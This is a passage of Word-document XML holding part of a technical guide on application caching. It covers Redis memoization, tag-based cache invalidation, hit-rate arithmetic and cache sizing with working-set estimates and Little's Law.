        <w:t># 2 queries total (batch orders + batch missing users) regardless of N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0109CE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The memoization pattern for expensive computations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1EAF1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF07DB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def cache_expensive_query(cache_key, compute_fn, ttl=3600):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD0A0B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cached = redis.get(cache_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7054A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if cached:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2B1B1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return json.loads(cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197838E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9EB787" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    result = compute_fn()  # expensive: complex join, aggregation, ML inference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF380D2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    redis.setex(cache_key, ttl, json.dumps(result))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1DCC4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F3B4D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="76B2A241" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E079B0A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_user_recommendations(user_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D39930" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return cache_expensive_query(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A89604" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        f'recommendations:{user_id}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528FC72F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        lambda: ml_model.predict(user_id),  # 200ms ML inference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D92499" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        ttl=3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DE935" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC87830" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query result cache invalidation via cache tags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB78C6D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B92F3EA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def update_product(product_id, new_data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA401F8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    db.update('products', product_id, new_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EC5624" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1951F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Invalidate all cached queries that might include this product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B28B6C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    tags = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B7ACF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        f'product:{product_id}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC34977" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        f'category:{new_data.category_id}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE63438" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        'product_listing',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E27F3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        'search_index'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF8CCA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8F06E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    invalidate_by_tags(tags)  # batch invalidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBC9E01" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38065186" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Cache population with tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65724E41" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_category_products(category_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3105E0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return cache_with_tags(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB62A8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        key=f'category_products:{category_id}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC47950" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        tags=[f'category:{category_id}', 'product_listing'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6EA0F9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        compute_fn=lambda: db.query("SELECT * FROM products WHERE category_id = %s", category_id),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2218B2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        ttl=1800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A2CE4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20392AEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="078FD12F">
          <v:rect id="_x0000_i4795" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30A8ED" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Cache Sizing and Performance Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD7C58" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hit Rate Analysis — The Critical Metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327F331" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hit rate = cache hits / total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9739F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Every percentage point of hit rate improvement has multiplicative impact on backing store load:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C57CEA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34561B6A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>At 10,000 RPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66667577" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  80% hit rate: 2,000 RPS to backing store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B54CC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  90% hit rate: 1,000 RPS to backing store (2× improvement in backing store load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4EE2AD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  95% hit rate:   500 RPS to backing store (4× improvement from 80%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B0122" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  99% hit rate:   100 RPS to backing store (20× improvement from 80%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C47399C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  99.9% hit rate:  10 RPS to backing store (200× improvement from 80%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A01B8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hit rate vs cache size relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA0C6D5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Hit rate improves with cache size, but with diminishing returns following the </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>working set curve</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8D529" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916626E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Cache Size (% of data)  Hit Rate (typical web workload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAFC4F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  1%                     30-40%   (only very hot items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E678C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  5%                     50-60%   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1741A5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  10%                    65-75%   (Zipf's law: top 10% = 70% of accesses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E4457" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  20%                    80-85%   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD07893" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  50%                    90-95%   (most of the working set)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE775E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  100%                   95-99%   (full cache — misses only for new items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26346E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The optimal cache size:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> The inflection point where doubling the cache size gives diminishing hit rate improvement. For typical web workloads with Zipfian access patterns, this is often around 10–20% of the total data size — beyond this, each additional GB of cache buys very little hit rate improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B62D4A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Sizing Formula</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F434BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Working set estimation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D983418" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731332E4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Working set = items accessed in the last T seconds × average item size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42943B2E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="4BAF3258" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>For T = 1 hour (typical session/request working set):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B439F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Track access_time per key in Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CDE295" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Working set size = count(keys where access_time &gt; now - 3600) × avg_item_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A5455" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="3E02116D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>In practice: analyze access logs to find the distribution of item access frequencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7063668D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Sort items by access frequency (Zipf distribution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306214E7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Determine: what fraction of items accounts for X% of accesses?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8A820" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Cache that fraction → achieve X% hit rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6B508" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Little's Law applied to cache sizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBBD2D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56946143" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>L = λ × W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15643B68" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="4147C61E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>L = average items in cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798855B8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>λ = item access rate (accesses/second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D7877" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>W = average item lifetime in cache (seconds = TTL on average)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D135A8C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="6A85ADA9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>For target cache size L = 10GB with avg item size 10KB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25640F87" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L = 10GB / 10KB = 1,000,000 items in cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB46D70" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL = 3600 seconds (1 hour)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7086D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Required throughput to maintain full cache: λ = L/W = 1,000,000/3600 ≈ 278 items/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B13EA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7DB71" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  If actual access rate &gt;&gt; 278/second: cache will be well-utilized (items accessed multiple times per TTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA32F2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  If actual access rate &lt;&lt; 278/second: cache is oversized (items expire before being reaccessed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E17742" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Performance Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA8F6DE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The metrics that actually matter:</w:t>
      </w:r>
